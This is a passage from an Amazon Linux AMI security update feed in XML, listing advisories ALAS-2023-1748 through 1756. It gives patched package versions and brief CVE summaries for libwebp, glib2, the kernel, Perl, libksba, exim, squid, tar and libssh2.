arch="x86_64"><filename>Packages/libwbclient-4.10.16-24.66.amzn1.x86_64.rpm</filename></package><package name="samba-common" version="4.10.16" release="24.66.amzn1" epoch="0" arch="noarch"><filename>Packages/samba-common-4.10.16-24.66.amzn1.noarch.rpm</filename></package><package name="samba-debuginfo" version="4.10.16" release="24.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-debuginfo-4.10.16-24.66.amzn1.x86_64.rpm</filename></package><package name="samba-python-test" version="4.10.16" release="24.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-python-test-4.10.16-24.66.amzn1.x86_64.rpm</filename></package><package name="samba-pidl" version="4.10.16" release="24.66.amzn1" epoch="0" arch="noarch"><filename>Packages/samba-pidl-4.10.16-24.66.amzn1.noarch.rpm</filename></package><package name="samba-common-tools" version="4.10.16" release="24.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-common-tools-4.10.16-24.66.amzn1.x86_64.rpm</filename></package><package name="samba-python" version="4.10.16" release="24.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-python-4.10.16-24.66.amzn1.x86_64.rpm</filename></package><package name="samba-client" version="4.10.16" release="24.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-client-4.10.16-24.66.amzn1.x86_64.rpm</filename></package><package name="samba-devel" version="4.10.16" release="24.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-devel-4.10.16-24.66.amzn1.x86_64.rpm</filename></package><package name="samba-client-libs" version="4.10.16" release="24.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-client-libs-4.10.16-24.66.amzn1.x86_64.rpm</filename></package><package name="ctdb-tests" version="4.10.16" release="24.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/ctdb-tests-4.10.16-24.66.amzn1.x86_64.rpm</filename></package><package name="libsmbclient-devel" version="4.10.16" release="24.66.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/libsmbclient-devel-4.10.16-24.66.amzn1.x86_64.rpm</filename></package><package name="samba-krb5-printing" version="4.10.16" release="24.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-krb5-printing-4.10.16-24.66.amzn1.x86_64.rpm</filename></package><package name="libwbclient-devel" version="4.10.16" release="24.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/libwbclient-devel-4.10.16-24.66.amzn1.x86_64.rpm</filename></package><package name="samba-winbind-clients" version="4.10.16" release="24.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-clients-4.10.16-24.66.amzn1.x86_64.rpm</filename></package><package name="samba-test" version="4.10.16" release="24.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-test-4.10.16-24.66.amzn1.x86_64.rpm</filename></package><package name="libsmbclient" version="4.10.16" release="24.66.amzn1" epoch="0" arch="i686"><filename>Packages/libsmbclient-4.10.16-24.66.amzn1.i686.rpm</filename></package><package name="samba-client" version="4.10.16" release="24.66.amzn1" epoch="0" arch="i686"><filename>Packages/samba-client-4.10.16-24.66.amzn1.i686.rpm</filename></package><package name="samba-test" version="4.10.16" release="24.66.amzn1" epoch="0" arch="i686"><filename>Packages/samba-test-4.10.16-24.66.amzn1.i686.rpm</filename></package><package name="samba-common-libs" version="4.10.16" release="24.66.amzn1" epoch="0" arch="i686"><filename>Packages/samba-common-libs-4.10.16-24.66.amzn1.i686.rpm</filename></package><package name="ctdb" version="4.10.16" release="24.66.amzn1" epoch="0" arch="i686"><filename>Packages/ctdb-4.10.16-24.66.amzn1.i686.rpm</filename></package><package name="samba-common-tools" version="4.10.16" release="24.66.amzn1" epoch="0" arch="i686"><filename>Packages/samba-common-tools-4.10.16-24.66.amzn1.i686.rpm</filename></package><package name="samba-python-test" version="4.10.16" release="24.66.amzn1" epoch="0" 
arch="i686"><filename>Packages/samba-python-test-4.10.16-24.66.amzn1.i686.rpm</filename></package><package name="libwbclient" version="4.10.16" release="24.66.amzn1" epoch="0" arch="i686"><filename>Packages/libwbclient-4.10.16-24.66.amzn1.i686.rpm</filename></package><package name="libsmbclient-devel" version="4.10.16" release="24.66.amzn1" epoch="0" arch="i686"><filename>Packages/libsmbclient-devel-4.10.16-24.66.amzn1.i686.rpm</filename></package><package name="samba-debuginfo" version="4.10.16" release="24.66.amzn1" epoch="0" arch="i686"><filename>Packages/samba-debuginfo-4.10.16-24.66.amzn1.i686.rpm</filename></package><package name="samba-winbind-krb5-locator" version="4.10.16" release="24.66.amzn1" epoch="0" arch="i686"><filename>Packages/samba-winbind-krb5-locator-4.10.16-24.66.amzn1.i686.rpm</filename></package><package name="samba-test-libs" version="4.10.16" release="24.66.amzn1" epoch="0" arch="i686"><filename>Packages/samba-test-libs-4.10.16-24.66.amzn1.i686.rpm</filename></package><package name="samba-client-libs" version="4.10.16" release="24.66.amzn1" epoch="0" arch="i686"><filename>Packages/samba-client-libs-4.10.16-24.66.amzn1.i686.rpm</filename></package><package name="samba-winbind-clients" version="4.10.16" release="24.66.amzn1" epoch="0" arch="i686"><filename>Packages/samba-winbind-clients-4.10.16-24.66.amzn1.i686.rpm</filename></package><package name="samba-libs" version="4.10.16" release="24.66.amzn1" epoch="0" arch="i686"><filename>Packages/samba-libs-4.10.16-24.66.amzn1.i686.rpm</filename></package><package name="samba-python" version="4.10.16" release="24.66.amzn1" epoch="0" arch="i686"><filename>Packages/samba-python-4.10.16-24.66.amzn1.i686.rpm</filename></package><package name="samba-winbind-modules" version="4.10.16" release="24.66.amzn1" epoch="0" arch="i686"><filename>Packages/samba-winbind-modules-4.10.16-24.66.amzn1.i686.rpm</filename></package><package name="samba-krb5-printing" version="4.10.16" release="24.66.amzn1" epoch="0" 
arch="i686"><filename>Packages/samba-krb5-printing-4.10.16-24.66.amzn1.i686.rpm</filename></package><package name="samba-winbind" version="4.10.16" release="24.66.amzn1" epoch="0" arch="i686"><filename>Packages/samba-winbind-4.10.16-24.66.amzn1.i686.rpm</filename></package><package name="samba" version="4.10.16" release="24.66.amzn1" epoch="0" arch="i686"><filename>Packages/samba-4.10.16-24.66.amzn1.i686.rpm</filename></package><package name="samba-devel" version="4.10.16" release="24.66.amzn1" epoch="0" arch="i686"><filename>Packages/samba-devel-4.10.16-24.66.amzn1.i686.rpm</filename></package><package name="libwbclient-devel" version="4.10.16" release="24.66.amzn1" epoch="0" arch="i686"><filename>Packages/libwbclient-devel-4.10.16-24.66.amzn1.i686.rpm</filename></package><package name="ctdb-tests" version="4.10.16" release="24.66.amzn1" epoch="0" arch="i686"><filename>Packages/ctdb-tests-4.10.16-24.66.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1748</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1748: medium priority package update for libwebp</title><issued date="2023-05-11 18:00:00" /><updated date="2023-05-23 20:54:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-25013:
A heap-based buffer overflow was found in libwebp in versions before 1.0.1 in ShiftBytes().
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-25013" title="" id="CVE-2018-25013" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libwebp-devel" version="0.3.0" release="10.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/libwebp-devel-0.3.0-10.9.amzn1.x86_64.rpm</filename></package><package name="libwebp-debuginfo" version="0.3.0" release="10.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/libwebp-debuginfo-0.3.0-10.9.amzn1.x86_64.rpm</filename></package><package name="libwebp" version="0.3.0" release="10.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/libwebp-0.3.0-10.9.amzn1.x86_64.rpm</filename></package><package name="libwebp-java" version="0.3.0" release="10.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/libwebp-java-0.3.0-10.9.amzn1.x86_64.rpm</filename></package><package name="libwebp-tools" version="0.3.0" release="10.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/libwebp-tools-0.3.0-10.9.amzn1.x86_64.rpm</filename></package><package name="libwebp-tools" version="0.3.0" release="10.9.amzn1" epoch="0" arch="i686"><filename>Packages/libwebp-tools-0.3.0-10.9.amzn1.i686.rpm</filename></package><package name="libwebp-debuginfo" version="0.3.0" release="10.9.amzn1" epoch="0" arch="i686"><filename>Packages/libwebp-debuginfo-0.3.0-10.9.amzn1.i686.rpm</filename></package><package name="libwebp-java" version="0.3.0" release="10.9.amzn1" epoch="0" arch="i686"><filename>Packages/libwebp-java-0.3.0-10.9.amzn1.i686.rpm</filename></package><package name="libwebp" version="0.3.0" release="10.9.amzn1" epoch="0" arch="i686"><filename>Packages/libwebp-0.3.0-10.9.amzn1.i686.rpm</filename></package><package name="libwebp-devel" version="0.3.0" release="10.9.amzn1" epoch="0" arch="i686"><filename>Packages/libwebp-devel-0.3.0-10.9.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" 
author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1749</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1749: important priority package update for glib2</title><issued date="2023-05-11 18:00:00" /><updated date="2023-05-23 20:54:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-16429:
GNOME GLib 2.56.1 has an out-of-bounds read vulnerability in g_markup_parse_context_parse() in gmarkup.c, related to utf8_str().
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16429" title="" id="CVE-2018-16429" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="glib2-devel" version="2.36.3" release="5.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/glib2-devel-2.36.3-5.24.amzn1.x86_64.rpm</filename></package><package name="glib2-fam" version="2.36.3" release="5.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/glib2-fam-2.36.3-5.24.amzn1.x86_64.rpm</filename></package><package name="glib2" version="2.36.3" release="5.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/glib2-2.36.3-5.24.amzn1.x86_64.rpm</filename></package><package name="glib2-doc" version="2.36.3" release="5.24.amzn1" epoch="0" arch="noarch"><filename>Packages/glib2-doc-2.36.3-5.24.amzn1.noarch.rpm</filename></package><package name="glib2-debuginfo" version="2.36.3" release="5.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/glib2-debuginfo-2.36.3-5.24.amzn1.x86_64.rpm</filename></package><package name="glib2-devel" version="2.36.3" release="5.24.amzn1" epoch="0" arch="i686"><filename>Packages/glib2-devel-2.36.3-5.24.amzn1.i686.rpm</filename></package><package name="glib2" version="2.36.3" release="5.24.amzn1" epoch="0" arch="i686"><filename>Packages/glib2-2.36.3-5.24.amzn1.i686.rpm</filename></package><package name="glib2-fam" version="2.36.3" release="5.24.amzn1" epoch="0" arch="i686"><filename>Packages/glib2-fam-2.36.3-5.24.amzn1.i686.rpm</filename></package><package name="glib2-debuginfo" version="2.36.3" release="5.24.amzn1" epoch="0" arch="i686"><filename>Packages/glib2-debuginfo-2.36.3-5.24.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1750</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1750: important priority package update for 
kernel</title><issued date="2023-05-25 17:41:00" /><updated date="2023-06-06 18:36:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-32233:
In the Linux kernel through 6.3.1, a use-after-free in Netfilter nf_tables when processing batch requests can be abused to perform arbitrary read and write operations on kernel memory. Unprivileged local users can obtain root privileges. This occurs because anonymous sets are mishandled.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32233" title="" id="CVE-2023-32233" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel" version="4.14.314" release="164.539.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.314-164.539.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.314" release="164.539.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.314-164.539.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.314" release="164.539.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.314-164.539.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.314" release="164.539.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.314-164.539.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.314" release="164.539.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.314-164.539.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.314" release="164.539.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.314-164.539.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.314" release="164.539.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.314-164.539.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.314" release="164.539.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.314-164.539.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.314" release="164.539.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.314-164.539.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.314" 
release="164.539.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.314-164.539.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.314" release="164.539.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.314-164.539.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.314" release="164.539.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.314-164.539.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.314" release="164.539.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.314-164.539.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.314" release="164.539.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.314-164.539.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.314" release="164.539.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.314-164.539.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.314" release="164.539.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.314-164.539.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.314" release="164.539.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.314-164.539.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.314" release="164.539.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.314-164.539.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.314" release="164.539.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.314-164.539.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.314" release="164.539.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.314-164.539.amzn1.i686.rpm</filename></package></collection></pkglist></update><update 
status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1751</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1751: important priority package update for perl</title><issued date="2023-05-25 17:41:00" /><updated date="2023-06-06 18:36:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-31484:
HTTP::Tiny 0.082, a Perl core module since 5.13.9 and available standalone on CPAN, has an insecure default TLS configuration where users must opt in to verify certificates.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-31484" title="" id="CVE-2023-31484" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="perl-ExtUtils-CBuilder" version="0.28.2.6" release="294.44.amzn1" epoch="1" arch="noarch"><filename>Packages/perl-ExtUtils-CBuilder-0.28.2.6-294.44.amzn1.noarch.rpm</filename></package><package name="perl-Module-Loaded" version="0.08" release="294.44.amzn1" epoch="1" arch="noarch"><filename>Packages/perl-Module-Loaded-0.08-294.44.amzn1.noarch.rpm</filename></package><package name="perl-debuginfo" version="5.16.3" release="294.44.amzn1" epoch="4" arch="x86_64"><filename>Packages/perl-debuginfo-5.16.3-294.44.amzn1.x86_64.rpm</filename></package><package name="perl" version="5.16.3" release="294.44.amzn1" epoch="4" arch="x86_64"><filename>Packages/perl-5.16.3-294.44.amzn1.x86_64.rpm</filename></package><package name="perl-macros" version="5.16.3" release="294.44.amzn1" epoch="4" arch="x86_64"><filename>Packages/perl-macros-5.16.3-294.44.amzn1.x86_64.rpm</filename></package><package name="perl-Pod-Escapes" version="1.04" release="294.44.amzn1" epoch="1" arch="noarch"><filename>Packages/perl-Pod-Escapes-1.04-294.44.amzn1.noarch.rpm</filename></package><package name="perl-CPAN" version="1.9800" release="294.44.amzn1" epoch="0" arch="noarch"><filename>Packages/perl-CPAN-1.9800-294.44.amzn1.noarch.rpm</filename></package><package name="perl-IO-Zlib" version="1.10" release="294.44.amzn1" epoch="1" arch="noarch"><filename>Packages/perl-IO-Zlib-1.10-294.44.amzn1.noarch.rpm</filename></package><package name="perl-Locale-Maketext-Simple" version="0.21" release="294.44.amzn1" epoch="1" arch="noarch"><filename>Packages/perl-Locale-Maketext-Simple-0.21-294.44.amzn1.noarch.rpm</filename></package><package name="perl-ExtUtils-Install" version="1.58" release="294.44.amzn1" epoch="0" 
arch="noarch"><filename>Packages/perl-ExtUtils-Install-1.58-294.44.amzn1.noarch.rpm</filename></package><package name="perl-ExtUtils-Embed" version="1.30" release="294.44.amzn1" epoch="0" arch="noarch"><filename>Packages/perl-ExtUtils-Embed-1.30-294.44.amzn1.noarch.rpm</filename></package><package name="perl-libs" version="5.16.3" release="294.44.amzn1" epoch="4" arch="x86_64"><filename>Packages/perl-libs-5.16.3-294.44.amzn1.x86_64.rpm</filename></package><package name="perl-tests" version="5.16.3" release="294.44.amzn1" epoch="4" arch="x86_64"><filename>Packages/perl-tests-5.16.3-294.44.amzn1.x86_64.rpm</filename></package><package name="perl-Time-Piece" version="1.20.1" release="294.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/perl-Time-Piece-1.20.1-294.44.amzn1.x86_64.rpm</filename></package><package name="perl-Package-Constants" version="0.02" release="294.44.amzn1" epoch="1" arch="noarch"><filename>Packages/perl-Package-Constants-0.02-294.44.amzn1.noarch.rpm</filename></package><package name="perl-devel" version="5.16.3" release="294.44.amzn1" epoch="4" arch="x86_64"><filename>Packages/perl-devel-5.16.3-294.44.amzn1.x86_64.rpm</filename></package><package name="perl-Object-Accessor" version="0.42" release="294.44.amzn1" epoch="1" arch="noarch"><filename>Packages/perl-Object-Accessor-0.42-294.44.amzn1.noarch.rpm</filename></package><package name="perl-core" version="5.16.3" release="294.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/perl-core-5.16.3-294.44.amzn1.x86_64.rpm</filename></package><package name="perl-Module-CoreList" version="2.76.02" release="294.44.amzn1" epoch="1" arch="noarch"><filename>Packages/perl-Module-CoreList-2.76.02-294.44.amzn1.noarch.rpm</filename></package><package name="perl-libs" version="5.16.3" release="294.44.amzn1" epoch="4" arch="i686"><filename>Packages/perl-libs-5.16.3-294.44.amzn1.i686.rpm</filename></package><package name="perl-devel" version="5.16.3" release="294.44.amzn1" epoch="4" 
arch="i686"><filename>Packages/perl-devel-5.16.3-294.44.amzn1.i686.rpm</filename></package><package name="perl-debuginfo" version="5.16.3" release="294.44.amzn1" epoch="4" arch="i686"><filename>Packages/perl-debuginfo-5.16.3-294.44.amzn1.i686.rpm</filename></package><package name="perl-macros" version="5.16.3" release="294.44.amzn1" epoch="4" arch="i686"><filename>Packages/perl-macros-5.16.3-294.44.amzn1.i686.rpm</filename></package><package name="perl-tests" version="5.16.3" release="294.44.amzn1" epoch="4" arch="i686"><filename>Packages/perl-tests-5.16.3-294.44.amzn1.i686.rpm</filename></package><package name="perl" version="5.16.3" release="294.44.amzn1" epoch="4" arch="i686"><filename>Packages/perl-5.16.3-294.44.amzn1.i686.rpm</filename></package><package name="perl-Time-Piece" version="1.20.1" release="294.44.amzn1" epoch="0" arch="i686"><filename>Packages/perl-Time-Piece-1.20.1-294.44.amzn1.i686.rpm</filename></package><package name="perl-core" version="5.16.3" release="294.44.amzn1" epoch="0" arch="i686"><filename>Packages/perl-core-5.16.3-294.44.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1752</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1752: important priority package update for libksba</title><issued date="2023-05-25 17:41:00" /><updated date="2023-06-06 18:36:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-47629:
Libksba before 1.6.3 is prone to an integer overflow vulnerability in the CRL signature parser.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-47629" title="" id="CVE-2022-47629" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libksba-debuginfo" version="1.3.5" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/libksba-debuginfo-1.3.5-1.11.amzn1.x86_64.rpm</filename></package><package name="libksba-devel" version="1.3.5" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/libksba-devel-1.3.5-1.11.amzn1.x86_64.rpm</filename></package><package name="libksba" version="1.3.5" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/libksba-1.3.5-1.11.amzn1.x86_64.rpm</filename></package><package name="libksba-devel" version="1.3.5" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/libksba-devel-1.3.5-1.11.amzn1.i686.rpm</filename></package><package name="libksba" version="1.3.5" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/libksba-1.3.5-1.11.amzn1.i686.rpm</filename></package><package name="libksba-debuginfo" version="1.3.5" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/libksba-debuginfo-1.3.5-1.11.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1753</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1753: medium priority package update for exim</title><issued date="2023-05-25 17:41:00" /><updated date="2023-06-06 18:36:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-37451:
Exim before 4.96 has an invalid free in pam_converse in auths/call_pam.c because store_free is not used after store_malloc.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-37451" title="" id="CVE-2022-37451" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="exim-greylist" version="4.92" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-greylist-4.92-1.37.amzn1.x86_64.rpm</filename></package><package name="exim-mon" version="4.92" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-mon-4.92-1.37.amzn1.x86_64.rpm</filename></package><package name="exim-mysql" version="4.92" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-mysql-4.92-1.37.amzn1.x86_64.rpm</filename></package><package name="exim" version="4.92" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-4.92-1.37.amzn1.x86_64.rpm</filename></package><package name="exim-pgsql" version="4.92" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-pgsql-4.92-1.37.amzn1.x86_64.rpm</filename></package><package name="exim-debuginfo" version="4.92" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-debuginfo-4.92-1.37.amzn1.x86_64.rpm</filename></package><package name="exim" version="4.92" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/exim-4.92-1.37.amzn1.i686.rpm</filename></package><package name="exim-pgsql" version="4.92" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/exim-pgsql-4.92-1.37.amzn1.i686.rpm</filename></package><package name="exim-mysql" version="4.92" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/exim-mysql-4.92-1.37.amzn1.i686.rpm</filename></package><package name="exim-debuginfo" version="4.92" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/exim-debuginfo-4.92-1.37.amzn1.i686.rpm</filename></package><package name="exim-greylist" version="4.92" release="1.37.amzn1" epoch="0" 
arch="i686"><filename>Packages/exim-greylist-4.92-1.37.amzn1.i686.rpm</filename></package><package name="exim-mon" version="4.92" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/exim-mon-4.92-1.37.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1754</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1754: important priority package update for squid</title><issued date="2023-05-25 17:41:00" /><updated date="2023-06-06 18:36:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-14058:
An issue was discovered in Squid before 4.12 and 5.x before 5.0.3. Due to use of a potentially dangerous function, Squid and the default certificate validation helper are vulnerable to a Denial of Service when opening a TLS connection to an attacker-controlled server for HTTPS. This occurs because unrecognized error values are mapped to NULL, but later code expects that each error value is mapped to a valid error string.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14058" title="" id="CVE-2020-14058" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="squid-debuginfo" version="3.5.20" release="17.45.amzn1" epoch="7" arch="x86_64"><filename>Packages/squid-debuginfo-3.5.20-17.45.amzn1.x86_64.rpm</filename></package><package name="squid-migration-script" version="3.5.20" release="17.45.amzn1" epoch="7" arch="x86_64"><filename>Packages/squid-migration-script-3.5.20-17.45.amzn1.x86_64.rpm</filename></package><package name="squid" version="3.5.20" release="17.45.amzn1" epoch="7" arch="x86_64"><filename>Packages/squid-3.5.20-17.45.amzn1.x86_64.rpm</filename></package><package name="squid" version="3.5.20" release="17.45.amzn1" epoch="7" arch="i686"><filename>Packages/squid-3.5.20-17.45.amzn1.i686.rpm</filename></package><package name="squid-debuginfo" version="3.5.20" release="17.45.amzn1" epoch="7" arch="i686"><filename>Packages/squid-debuginfo-3.5.20-17.45.amzn1.i686.rpm</filename></package><package name="squid-migration-script" version="3.5.20" release="17.45.amzn1" epoch="7" arch="i686"><filename>Packages/squid-migration-script-3.5.20-17.45.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1755</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1755: medium priority package update for tar</title><issued date="2023-05-25 17:41:00" /><updated date="2023-06-06 18:36:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-9923:
pax_decode_header in sparse.c in GNU Tar before 1.32 had a NULL pointer dereference when parsing certain archives that have malformed extended headers.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9923" title="" id="CVE-2019-9923" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tar-debuginfo" version="1.26" release="31.24.amzn1" epoch="2" arch="x86_64"><filename>Packages/tar-debuginfo-1.26-31.24.amzn1.x86_64.rpm</filename></package><package name="tar" version="1.26" release="31.24.amzn1" epoch="2" arch="x86_64"><filename>Packages/tar-1.26-31.24.amzn1.x86_64.rpm</filename></package><package name="tar" version="1.26" release="31.24.amzn1" epoch="2" arch="i686"><filename>Packages/tar-1.26-31.24.amzn1.i686.rpm</filename></package><package name="tar-debuginfo" version="1.26" release="31.24.amzn1" epoch="2" arch="i686"><filename>Packages/tar-debuginfo-1.26-31.24.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1756</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1756: medium priority package update for libssh2</title><issued date="2023-05-25 17:41:00" /><updated date="2023-06-06 18:36:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-3860:
An out of bounds read flaw was discovered in libssh2 before 1.8.1 in the way SFTP packets with empty payloads are parsed. A remote attacker who compromises an SSH server may be able to cause a Denial of Service or read data in the client memory.
CVE-2019-3859:
An out of bounds read flaw was discovered in libssh2 before 1.8.1 in the _libssh2_packet_require and _libssh2_packet_requirev functions. A remote attacker who compromises an SSH server may be able to cause a Denial of Service or read data in the client memory.
